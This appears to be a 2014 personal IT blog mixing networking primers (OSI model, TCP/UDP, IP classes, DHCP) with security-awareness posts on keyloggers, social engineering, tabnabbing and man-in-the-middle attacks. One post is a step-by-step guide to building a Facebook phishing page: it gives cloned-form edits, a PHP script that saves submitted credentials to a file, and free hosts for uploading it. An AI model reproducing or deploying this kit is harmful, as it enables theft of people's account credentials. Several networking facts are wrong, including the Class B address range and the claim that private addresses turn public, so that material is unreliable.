Saturday 20 September 2014

HOW TO INSTALL WHATSAPP ON PC/LAPTOP

How to install whatsapp on your computer or laptop ?




















First of all download bluestackoffline installer software then install bluestack offline installer on your pc after that open it and you will get whatsapp application there thats it.....................................


Tuesday 8 July 2014

TRANSPORT LAYER PROTCOL

Transport layer is responsible to make a packets and how data is transmitted in tcp environment. Transport layer recieves data from its upper layer and make packets of data and forward it to the network layer it perform flow control, reliability, sequence number or acknowledgements. Transport layer is a L4 layer of OSI Model which make segmentation..

TCP  ( Transmission control protocol)

TCP is a connection oriented protocol. It make packets of your data and  provide sequencing and give you acknowledgement of your data  and error checking or resend your data until its  received to the destination.

UDP (User data gram Protocol)

It is a connectionless protocol which is not provide you acknowledgement . Its only send your data to the destination without any acknowledgment. Voice communication are UDP

Sunday 6 July 2014

FACEBOOK ACCOUNT BACKUP

Yes you can take backup of your facebook account like your photos , videos, contact, post and etc just visit on https://register.facebook.com/editaccount.php 

just click on that link and download all your data from facebook...


ETHICAL HACKING

FOOTPRINTING

Foot printing is a first step which hacker has perform before hacking any website or network or accounts. Actually foot printing is a method or technique to gather your information . If hacker wants to hack your computer or account the first step he perform is foot printing first he gather all your information like your Operating system like which operating system you are using , what antivirus you are using or it is updated or not windows is patched or not so all these information first hacker gather before hacking any computer or accounts that's why it is recommended to you never provide your personal information on internet or telephone

MAC ADDRESS

As i told you in my previous tutorial that every computer or device connected on the network or internet has a unique identification number known as IP addresses same like  mac address is also required. Every Computer or laptop have a Physical Identification number which is mac (media access control address) it assigned to network interfaces for communication over the network or internet . Mac address are assigned by the manufacturer of your NIC (Network interface controller) mean when you purchased any computer or laptop from any bran they provide you a mac address or physical address for identification it is a unique number it represent like 08-00-29-00-58-E2, you can check your mac address just open CMD or type ipconfig/all

Saturday 5 July 2014

KEYLOGGER

Key logger is a software or application which has the capability to record every information you type from your keyboard . Hacker installed key logger on your computer without your knowledge and once it installed on your PC it sends all the information which you have typed  from your keyboard to the hacker in log file . We can also say its a surveillance tool which record your information without your knowledge . Mostly it installed on your PC when you don't  have updated Antivirus or window or  you have download free games, movies and files or unknown person email attachment.

NAME OF KEYLOGGERS

Sniper Spy 
Andra max Key logger
Refog key logger



RECOMMENDATION :- ALWAYS USED UPDATED ANTIVIRUS OR WINDOWS NEVER DOWNLOAD UNKNOWN PERSON EMAIL ATTACHMENT WITHOUT SCANNING . DOWNLOAD SOFTWARE OR GAMES ONLY FROM TRUSTED WEBSITES

HOW TO BECOME AN ETHICAL HACKER

Ethical Hacker is a person work with permission of the company or organization  to protect the network or application from hackers he help to increase the security . Security is ever evolving process . No network or computer is 100 percent secure.






To become an ethical hacker you required lot of skills in computer programming and networking , ethical hacker needs hands on security skills. Being an ethical hacker its your responsibility to perform penetration testing and check all the security or vulnerabilities in network or in application. Being an ethical hacker you should have the programming knowledge like C, C++, HTML., php. python, sql, although you must have the knowledge in networking like:-

1. Routing knowledge (Routing Protocols)
2.OSI Model , TCP/IP
3.ACL (Access control list)
4.Firewalls, IPS, (Intrusion Preventation system), IDS (Intrusion detection system)
5.Microsoft Server 2008 or 2010
6.Linux or (Backtrack open source)

                                                           KNOWLEDGE REQUIRED

INFORMATION GATHERING  

 SOCIAL ENGINEERING ATTACK

PHISHING ATTACK

DNS POISONING (ADVANCED PHISHING) 

SNIFFERS

PHYSICAL ACCESS

SESSION HIJACKING (MAN IN THE MIDDLE ATTACK)

SQL INJECTION

XXS ATTACK

BRUTE FORCING ATTACK (PASSWORD GUESSING)

DOS ATTACK

DDOS ATTACK  

WINDOWS HACKING

LINUX HACKING

CRYPTOGRAPHY

WIRELESS HACKING TECHNIQUE (WEP OR WAP CRACK TOOLS)

TROJANS AND BACKDOORS

PROXY SERVER AND ETC...


Hacker is a very intelligent person who have very good knowledge in all above programming and networking or to become an ethical hacker you must have all the knowledge which i have mention above . We will learn all these thing one by one in our upcoming lecture or tutorials.

SOCIAL ENGINNERING

Social engineering is a method or technique to get into the network or a system. Social engineering is used to obtain your personal information like your name date of birth bank account details and email accounts details or your network details etc. Social engineering commonly done by the telephone or internet to get the sensitive information or to get them to do something which is against the security policies of company or organization. In social engineering attack you get the telephone call or email where your personal information ask or if you provide your information on telephone or internet you will get the victim.


NEVER RESPOND TO ANY PHONE CALL OR EMAIL WHERE YOUR PERSONAL INFORMATION ASK. ALWAYS VERIFY THE WEBSITE BEFORE ENTERING YOUR PERSONAL INFORMATION

For more details on social engineering watch my video tutorial

Friday 4 July 2014

TAB NAPPING

Tab napping is a new advanced method of phishing it is also used to steal your personal information like username and passwords, bank details or password and etc. Tab napping is done when you have multiples tab open like you are watching videos on you tube or chatting on Facebook and booking tickets etc, its something script which you enter into your web site or blog and when the victim visit on your website or blog or click on your link now when you go to the other tab You will be redirect to the phishing page which hacker has created and it will ask you to enter the user name and password like you were chatting on the Facebook and also watching videos on you tube now you will be redirect again to Facebook page and it will ask you to enter your username and password again and when you enter your user name and password hacker will get all your information because it was a phishing page.




DO NOT CLICK ANY LINK BEFORE VERIFYING IT OR DO NOT OPEN MULTIPLE TABS WHILE ENTERING YOUR BANK DETAILS OR INTERNET SHOPPING.

HIJACT RACT ANDROID MALWARE

HIJACK RACT ia  new android malware which comprise accounts of mobile banking users
 It can give remote control of the infected device to hackers. It can steal your personal information like SMS or messages and also read your contacts ,

HOW HACKERS HACK USING PHIHING ATTACK

As i already told you about phishing in my video tutorial that how hackers hack your email account using phishing . Phishing is fraudulent scam where hacker sends you a link of phishing website to you and when you double click on that link it will take you to the fake website which hacker has created . Phishing is used to steal your personal information like your email account password, your bank accounts details or passwords and etc depending upon the hacker what he wants. Phishing is a Social Engineering attack where hacker create a fake login page of the website or send it you and ask you to open that website or  when you open that website or enter your personal information on the website  hacker gets that information because you have not entered the information on the real page or website , you have entered the information on hacker websites or login page which he has uploaded on the web hosting account or web server so he will get all your information which you have been entered.


THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSES FREE IT EDUCATION WORLD IS NOT MOTIVATING  YOU OR ENCOURAGING YOU FOR HACKING  . HACKING IS ILLEGAL OR CRIME .


How hackers create a phishing page ?

1. First You need a  a web hosting account where you can upload all you files . You can upload your files on a free webhosting account you can create a free web hosting account like my2gb.com or byethost.com or etc.

2. After creating a web hosting account now you need a phishing page or PHP file to create a fake page of the website you just open that website like if you want to create a fake page of facebook just open the facebook website and right click on the website or click on "view page source" option now you will see all the source code you can see in picture below

Now you can search for action="https://www.facebook.com/login.php

Now Change it to action="facebook.php and save the file with name as facebook.htm

3 Nor you need php code just copy the code and save in into note pad as facebook.php

 <?php
header (‘https://www.facebook.com’);
$handle = fopen(“facebook.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 

Copy the above code and paste it into notepad and save it as facebook.php
Now everything is done you have successfully link your code with facebook page now upload both the files facebook.php and facebook.htm on your web hosting account.

TO DETECT THE PHISHING PAGE OR PHISHING WEBSITE YOU CAN GO TO HTTP://WWW.PHISHTANK.COM
FORE MORE DETAILS ON PHISHING YOU CAN WATCH MY VIDEO TUTORIAL  HOW HACKERS HACK YOUR EMAIL ACCOUNT WITH PHISHING
http://www.freeiteducationworld.blogspot.in/2014/05/how-to-hack-facebook-account-part-1_6.html 

Tuesday 1 July 2014

OSI MODEL

Open System Interconnection (OSI) Model was Introduced in 1984. It has seven Layer which help computer to communicate with other computer over the Network. Its read from Top to bottom







7. Application Layer : It is responsible for message formatting like when we open internet explore we work on application layer
6. Presentation Layer:- It help to decrypt or encrypt the message or compression, decompression

5. Session Layer : It allows authentication or permission to make session restoration

4.Transport Layer:- End-to End Control error or make divide data into packets.

3.Network Layer :- It allows network addressing, ip addressing or routing , forward packets.
2.Data Link Layer : It detects error or flow control on physical link
1. Physical Layer :  Physical medium (cable or Lan card) method of representing bit, like hubs, or physical cable.



HOW TO RECOVER DELTE DATA FROM HARD DRIVE

When you delete you hard drive data or format your hard drive your data has not deleted permanently you can recover your HD Data with easily. There are lot of software available  in the market which can recover your data and Stellar Phoenix Windows Data Recovery Tool is the best tool to recover your HD Data . You can buy Sellar Phoenix Windows Data Recovery Tool
Stellar Phoenix Data recover


INCREASE INTERNET SPEED BY USING FIREFOX

If you are using Firefox browser so you can increase it speed by manually just type about:config in the address bar where you enter the website.

Now Search for Network http.pipelining.maxrequest . You can also enter this value in filter option now  double click on it and Change it value from 32 to now search network.http.proxy.pipelining double click on it  and make its value to true .








ENJOY THE SPEED......

Sunday 29 June 2014

INTERNET SECURITY TIPS

THINGS YOU MUST KNOW BEFORE DOING INTERNET SHOPPING OR INTERNET BANKING.



Saturday 28 June 2014

DNS SPOOFING ATTACK

Dns is a domain name server which provide name to ip resolution   . As you already know that every computer connected on the internet must have a unique numerical number called ip address. But in early days  wo don't have a DNS server to resolve the name to ip this task was performed by Host file which is stored in our computer System32/drivers/etc/host

Above you can see the picture of host file which is stored in your computer you can check .For more detail you can watch my video tutorial on DNS spoofing or Poisoning https://www.youtube.com/watch?v=zTdkB4ib6KM

BRUTE FORCE ATTACK

Brute force attack is used to crack windows passwords and etc. This is also called password guessing technique its happen when you have a weak password . If you have choose a weak password for your account so be aware brute force is easy method to crack your password its like a password guessing technique which can guess your password from Dictionary . Cain and Abel is the software which is used for brute force attack.



Never choose easy password for your account .  Always choose lengthy  and combination password which contain alpha+numeric+symbol. Change your password regularly in one month or two months

Friday 27 June 2014

DHCP SERVER

DHCP is a dynamic host configuration protocol server is used to assigned the ip addressed to the host computers . As you already know that every computer who wants to go on Internet must have a IP address which is 32 bit numerical number . When you connect internet your ISP assigned you a private IP address which can be 192.168.1.0  or etc but after you go on internet or access any website your private ip address automatically changed and become public ip address remember you can not access any website with a private ip address .Network administrator assigned a DHCP scope pool in DHCP Server which can be installed in ISP Window server OS or Router also can be used as a DHCP Server . How computer get the ip address when you connect internet your computer make a DHCP Discover broadcast and send it your ISP DHCP Server whatever it is and dhcp server replies with DHCP discover/ack and give the ip address in case dhcp server doen't reply or assigned you the ip address you can not go on the internet. 


BACKDOOR INTRODUCTION

Backdoor is a malicious program which is installed in your machine without your knowledge mostly when you have download free software , games , songs and etc from the internet. Once it installed in your machine by attacker he get the full access in your computer it can also bypass the security or antivirus couldn't detect it. But its not always used to harm your pc but sometimes used to troubleshooting the machine like programmers or system administrator installed backdoor in your machine to troubleshoot your desktop or computer but if attacker get to know you have installed backdoor he will get into your network or harm your network or machine.


Thursday 26 June 2014

NETWORK SECURITY TIPS

HOW TO PROTECT YOUR NETWORK SECURE

First of all you must Scan you network and check there should be no outdated software , antivirus or firewall etc your network should be fully patched and every thing should be updated. You must know you risk.

You must know your vulnerability (weakness) in your network. You should check your network and check if any vulnerably in the network you must solve it. You must guide to your domain users never download suspicious file or files from social networking websites. Although you have implement firewall or IPS but attacker can compromise your firewall.
You should try to crack your active directory users password using brute force attack or etc, you must guide or users to put strong and combination password and it should be changed every two or three weeks. You should perform penetration testing.
Social engineering are the most conman and easy attack to know your active directory passwords or access your network get together with users  and guide them about social engineering attacks.

IP ADDRESSING

WHAT IS AN IP ADDRESS


Every Computer connected on the Internet has a unique no. called Ip address. There are two IPv4 or IPV6 but still IPV4 is using mostly all over the India , which is a 32 bit numerical number in decimal format like:-



                                                         192.168.1.1(Private IP address)

The above ip address have 4 octets and one octet is 8 bit so 8x4=32 bit that's why ipv4 is a 32 bit number. IPv4 are three types 

Class A :- Starting from 1.0.0.0 to 126.0.0.0

Class B    Starting from 128.0.0.0 to 19.255.0.0

Class C    Starting from 192.0.0.0 to 223.255.255.25

Class D Multicast 224-239

IPv6 are 128 bits numerical number which represent in hexadecimal it has 16 periods 0 to 9 or A to F

MIMT Man in the middle Attack

Man in the Middle attack (Session Hijacking)

Man in the middle attack is a session hijacking technique . Whenever we lo-gin in our account or open any website it creates a session with that websites and a unique number which is session id is stored in our computer and it is only valid up that session is running until we lo-gout or close the website. 

Hacker gain access to session id to eavesdrop your information access to you information 
Note:-
ALWAYS USE HTTPS PROTOCOL INSTEAD OF HTTP BEFORE ENTERING YOUR INFORMATION TO ANY WEBSITE  ALWAYS CHECK IT URL MUST BE START FROM HTTPS (HYPERTEXT TRANSFER PROTOCOL SECURE) IT ENCRYPT YOUR MESSAGE SO NO MIDDLE MAN CAN READ IT.